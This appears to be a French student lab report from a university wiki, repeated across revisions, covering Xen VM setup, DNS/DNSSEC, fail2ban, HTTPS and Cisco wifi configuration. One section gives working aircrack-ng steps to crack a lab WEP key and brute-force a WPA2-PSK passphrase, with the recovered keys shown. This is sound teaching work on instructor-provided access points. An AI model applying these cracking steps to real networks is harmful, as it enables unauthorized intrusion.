On entre ensuite les commandes suivantes, inspirées de celle du sujet, afin de configurer notre '''point d'accès wifi''' :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

Par le suite nous avons modifié plusieurs fichiers sans succès. Cette dernière partie est donc '''incomplète''' et ne permet pas de validé cette dernière.

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-23T10:29:54Z

Abiernac : /* Vlan */

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires :<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>

Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

Pour '''restart''' le service<syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>

Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>On peut pour finir '''vérifier''' le bon fonctionnement de notre DNS via le site [https://dnsviz.net/ dnsviz]. Avec notre nom de domaine nous obtenons le graphe suivant :
[[Fichier:Deadpool.tech-2026-02-18-08 31 41-UTC.png|centré|vignette]]

== Fail2ban ==
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier <code>jail.local</code> dans le dossier <code>/etc/fail2ban</code>
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans <code>fail2ban.conf</code> (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour '''lancer le service''' il faut rentrer la commande suivante :
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

== HTTPS ==
Dans le dossier <code>/etc/apache2/sites-available</code>

On met la clef '''deadpool.tech.key''' et les certificats '''GandiCert.pem''' et '''deadpool.tech.crt''' (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les commande suivantes :<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

== Sécurisation WiFi par WPA2-EAP ==

=== Partie VLAN ===

Depuis la machine batman on se '''ssh sur le routeur''' via cette commande :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

'''Création du Vlan24''' avec le nom PoolAntonin :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour configurer le '''vlan''' que nous venons de créer ainsi que le '''VRRP''' j'ai fait ceci : ('''/!\''' l'adresse IPv4 de votre vlan doit être mise dans le tableau commun sur le wiki afin d'éviter tout conflit avec une autre personne)<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

=== Partie WIFI ===

On peut exit enfin pour se ssh cette fois sur la partie '''wifi''' :<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite les commandes suivantes, inspirées de celle du sujet, afin de configurer notre '''point d'accès wifi''' :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

Par le suite nous avons modifié plusieurs fichiers sans succès,

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-23T10:10:41Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>On modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes. Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>
== Configuration SSH et Mascarade ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>
La mascarade se configure avec '''iptables''', et consiste à donne une adresse IPv4 qui permet d'accéder à internet. <syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>Dans les '''trois VMs''' on modifie <code>/etc/ssh/sshd_config</code> en ajoutant :
PermitRootLogin yes
On peut ensuite '''redémarrer''' le service ssh :
/etc/init.d/ssh restart
La '''redirection du port ssh''' ce fait via les commandes suivantes sur la machine mandataire :<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>Dans le fichier <code>/etc/sysctl.conf</code> la ligne suivante doit être '''décommentée''' :<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>Nous avons aussi installer <code>iptables-persistent</code> pour éviter de perdre la configuration à chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Désormais le ssh peut être fait via les commandes suivantes :<syntaxhighlight lang="bash">
# ssh en IPV4
ssh root@<add_ipv4> -p 2202
# ssh en IPV6
ssh root@<add_ipv6>
</syntaxhighlight>

== DNS ==
On modifie le fichier <code>/etc/bind/named.conf.local</code> afin de fait passer par notre DNS et d'avoir le second DNS en backup :<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans <code>/etc/bind</code> et y créer le fichier <code>db.deadpool.tech</code><syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>
Modification du fichier <code>/etc/resolv.conf</code> (il faut '''commenter''' tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires :<syntaxhighlight lang="bash">
